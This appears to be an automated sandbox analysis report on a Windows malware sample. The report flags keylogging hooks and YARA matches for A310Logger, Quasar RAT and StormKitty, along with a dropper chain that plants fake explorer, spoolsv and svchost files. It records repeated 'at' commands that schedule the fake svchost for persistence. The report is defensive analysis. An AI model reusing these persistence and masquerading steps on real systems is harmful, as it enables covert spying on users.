6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:11:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: unknownHTTPS traffic detected: 51.81.194.202:443 -> 192.168.2.4:49766 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeWindows user hook set: 916 mouse C:\Windows\SYSTEM32\MSVBVM60.DLLJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeWindows user hook set: 1792 mouse C:\Windows\SYSTEM32\MSVBVM60.DLLJump to behavior
                Source: C:\Windows\System\explorer.exeWindows user hook set: 5244 mouse C:\Windows\SYSTEM32\MSVBVM60.DLLJump to behavior
                Source: C:\Windows\System\explorer.exeWindows user hook set: 0 keyboard low level c:\windows\system\explorer.exeJump to behavior
                Source: C:\Windows\System\explorer.exeWindows user hook set: 0 mouse low level c:\windows\system\explorer.exeJump to behavior
                Source: C:\Windows\System\spoolsv.exeWindows user hook set: 3472 mouse C:\Windows\SYSTEM32\MSVBVM60.DLLJump to behavior
                Source: C:\Windows\System\svchost.exeWindows user hook set: 784 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: C:\Windows\System\spoolsv.exeWindows user hook set: 4736 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: C:\Windows\System\explorer.exeWindows user hook set: 5540 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: C:\Windows\System\svchost.exeWindows user hook set: 6312 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: Lg3gn9y1Cj.exe, 00000000.00000002.270751235.000000000075A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Windows\System\explorer.exeWindows user hook set: 0 mouse low level c:\windows\system\explorer.exeJump to behavior

                System Summary

                barindex
                Potential malicious icon found
                Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
                Malicious sample detected (through community Yara rule)
                Source: Lg3gn9y1Cj.exe, type: SAMPLEMatched rule: Detects A310Logger Author: ditekSHen
                Source: 1.0.lg3gn9y1cj.exe .400000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                Source: 1.2.lg3gn9y1cj.exe .400000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                Source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                Source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                Source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe , type: DROPPEDMatched rule: Detects A310Logger Author: ditekSHen
                PE file has a writeable .text section
                Source: Lg3gn9y1Cj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: icsys.icn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: explorer.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: spoolsv.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: mrsys.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: svchost.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: stsys.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 0_2_0041F8300_2_0041F830
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 0_2_004161300_2_00416130
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 0_2_00422F500_2_00422F50
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Code function: 1_2_004019AC1_2_004019AC
                Source: lg3gn9y1cj.exe .0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Windows\System\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System\explorer.exeSection loaded: tokenbinding.dllJump to behavior
                Source: C:\Windows\System\svchost.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System\svchost.exeSection loaded: drprov.dllJump to behavior
                Source: C:\Windows\System\svchost.exeSection loaded: ntlanman.dllJump to behavior
                Source: C:\Windows\System\svchost.exeSection loaded: davclnt.dllJump to behavior
                Source: C:\Windows\System\svchost.exeSection loaded: davhlpr.dllJump to behavior
                Source: C:\Windows\System\svchost.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System\svchost.exeSection loaded: browcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\lg3gn9y1cj.exe 8A1902D9C0DBE388B28EF5A9C8EC4C0F1802FC6CCD43471EA337DCB3D71C81D4
                Source: Lg3gn9y1Cj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: Lg3gn9y1Cj.exe, type: SAMPLEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: 1.0.lg3gn9y1cj.exe .400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: 1.2.lg3gn9y1cj.exe .400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe , type: DROPPEDMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: C:\Users\user\AppData\Local\icsys.icn.exeFile deleted: C:\Windows\System\explorer.exeJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: c:\windows\system\explorer.exeJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Code function: String function: 004017F0 appears 49 times
                Source: Lg3gn9y1Cj.exe, 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWin.exe vs Lg3gn9y1Cj.exe
                Source: Lg3gn9y1Cj.exe, 00000000.00000003.269756688.00000000007A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoral.exe vs Lg3gn9y1Cj.exe
                Source: Lg3gn9y1Cj.exeBinary or memory string: OriginalFilenameWin.exe vs Lg3gn9y1Cj.exe
                Source: Lg3gn9y1Cj.exeBinary or memory string: OriginalFilenamesoral.exe vs Lg3gn9y1Cj.exe
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Windows\System\explorer.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Windows\System\spoolsv.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Windows\System\svchost.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Windows\System\spoolsv.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Windows\System\explorer.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Windows\System\svchost.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile created: C:\Users\user\AppData\Local\icsys.icn.exeJump to behavior
                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@144/20@13/5
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: lg3gn9y1cj.exe , 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: \gA*\AC:\Users\TTDOCKYARD\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                Source: Lg3gn9y1Cj.exe, 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000004.00000002.284335870.000000000042C000.00000004.00000001.01000000.0000000A.sdmp, spoolsv.exe, 00000007.00000002.281046560.000000000042C000.00000004.00000001.01000000.0000000C.sdmp, spoolsv.exe, 00000009.00000002.280212029.000000000042C000.00000004.00000001.01000000.0000000C.sdmp, explorer.exe, 00000022.00000002.316774261.000000000042C000.00000004.00000001.01000000.0000000B.sdmp, svchost.exe, 00000034.00000002.341661053.000000000042C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: f`P@*\AD:\Code\Explorer\Explorer.vbp
                Source: Lg3gn9y1Cj.exe, icsys.icn.exe.0.dr, svchost.exe.7.dr, spoolsv.exe.5.dr, mrsys.exe.5.dr, explorer.exe.4.dr, stsys.exe.8.drBinary or memory string: B*\AD:\Code\Explorer\Explorer.vbp
                Source: explorer.exe, 00000005.00000002.529162179.000000000042C000.00000004.00000001.01000000.0000000B.sdmp, svchost.exe, 00000008.00000002.528806074.000000000042C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: `P@*\AD:\Code\Explorer\Explorer.vbp
                Source: lg3gn9y1cj.exe , 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, lg3gn9y1cj.exe , 00000001.00000000.260922909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Lg3gn9y1Cj.exe, lg3gn9y1cj.exe .0.drBinary or memory string: A*\AC:\Users\TTDOCKYARD\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp<aA
                Source: lg3gn9y1cj.exe Binary or memory string: A*\AC:\Users\TTDOCKYARD\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                Source: Lg3gn9y1Cj.exeVirustotal: Detection: 87%
                Source: Lg3gn9y1Cj.exeReversingLabs: Detection: 100%
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile read: C:\Users\user\Desktop\Lg3gn9y1Cj.exeJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Lg3gn9y1Cj.exe "C:\Users\user\Desktop\Lg3gn9y1Cj.exe"
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess created: C:\Users\user\Desktop\lg3gn9y1cj.exe c:\users\user\desktop\lg3gn9y1cj.exe
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe
                Source: C:\Windows\System\explorer.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SE
                Source: C:\Windows\System\spoolsv.exeProcess created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exe
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PR
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: unknownProcess created: C:\Windows\System\explorer.exe "C:\windows\system\explorer.exe" RO
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
